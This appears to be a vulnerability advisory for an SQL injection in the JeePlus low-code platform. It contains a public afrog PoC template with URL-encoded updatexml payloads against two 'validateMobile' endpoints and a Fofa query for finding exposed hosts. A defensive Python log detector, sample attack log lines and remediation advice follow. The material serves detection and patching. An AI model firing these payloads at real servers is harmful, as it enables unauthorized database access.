jeeplus-sys-user-validate-sqli: SQL injection in the JeePlus low-code development platform

Date: 2025-09-01 | Affected software: JeePlus low-code development platform | PoC: public

Vulnerability description

SQL injection in the JeePlus low-code development platform. Fofa: app="JeePlus"

PoC code [public]

id: jeeplus-sys-user-validate-sqli

info:
  name: JeePlus低代码开发平台SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    JeePlus低代码开发平台SQL注入
    Fofa: app="JeePlus"
  reference:
    - https://github.com/zan8in/afrog-pocs/tree/main/pocs
  tags: jeeplus,sqli
  created: 2024/02/28

set:
  randInt: randomInt(1000000000, 9999999999)
rules:
  r0:
    request:
      method: GET
      path: /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%28{{randInt}}%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271
    expression: response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(bytes(substr(md5(string(randInt)),0,31)))
  r1:
    request:
      method: GET
      path: /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%28{{randInt}}%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271
    expression: response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(bytes(substr(md5(string(randInt)),0,31)))
expression: r0() || r1()
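
The PoC above fires when the `mobile` parameter of the two validate endpoints reaches the database unsanitized and the resulting XPATH error is echoed back. On the defensive side, the same request shape can be picked out of web-server access logs. The following is an added example written for this page, not code from the afrog project or from JeePlus: it parses combined-format access log lines (constructed samples, embedded below), restricts attention to the two paths named in the PoC, and flags a `mobile` value that either names an error-based injection function (`updatexml`, which the PoC uses, or its sibling `extractvalue`) or simply is not a plain number. The digits-only shape of a valid mobile value is an assumption for this example; adjust it to what the deployment actually accepts.

```python
"""Access-log detection for the JeePlus validateMobile SQLi shape.

Added example for this page; not part of the afrog PoC or of JeePlus.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# The two endpoints named in the PoC.
WATCHED_PATHS = {
    "/a/sys/user/validateMobile",
    "/a/sys/user/validateMobileExist",
}

# MySQL functions used for error-based injection; matched on the decoded value.
SQLI_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

# Assumption for this example: a legitimate mobile value is 6-15 digits.
VALID_MOBILE = re.compile(r"^\d{6,15}$")

# Minimal parser for Apache/Nginx combined log format (only the fields we use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyze_request(target):
    """Return a reason string if the request target looks like the PoC, else None."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return None
    # parse_qs already percent-decodes once; a leading '&' (as in the PoC URL)
    # yields an empty parameter that is simply skipped.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("mobile", []):
        # Decode a second time so double-encoded payloads are inspected in clear.
        decoded = unquote_plus(value)
        if SQLI_FUNCS.search(decoded):
            return "error-based SQLi function in mobile parameter"
        if not VALID_MOBILE.match(decoded):
            # Allow-list check: catches quote/boolean payloads the signature misses.
            return "mobile parameter is not a plain number"
    return None


def scan_access_log(lines):
    """Return one alert dict per suspicious request found in the log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = analyze_request(m["target"])
        if reason:
            alerts.append({
                "ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "reason": reason,
            })
    return alerts


# Constructed sample log lines (not from any real system). Line 2 carries the
# PoC payload with a fixed number in place of {{randInt}}; line 3 is a plain
# quote-based probe against the second endpoint.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2025:10:00:01 +0000] "GET /a/sys/user/validateMobile?&mobile=13800000000 HTTP/1.1" 200 17',
    '198.51.100.7 - - [01/Sep/2025:10:00:02 +0000] "GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281234567890%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1" 500 233',
    '203.0.113.9 - - [01/Sep/2025:10:00:03 +0000] "GET /a/sys/user/validateMobileExist?mobile=1%27+or+%271%27%3D%271 HTTP/1.1" 200 17',
    '203.0.113.9 - - [01/Sep/2025:10:00:04 +0000] "GET /a/login HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The signature check alone would miss the third sample line; the allow-list check on the parameter's expected shape is what catches it, which is why the example carries both. On the application side, the durable fix for this class of finding is to pass the mobile value to the database as a bound parameter rather than concatenating it into the query text, and to return a generic message instead of the raw database error.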
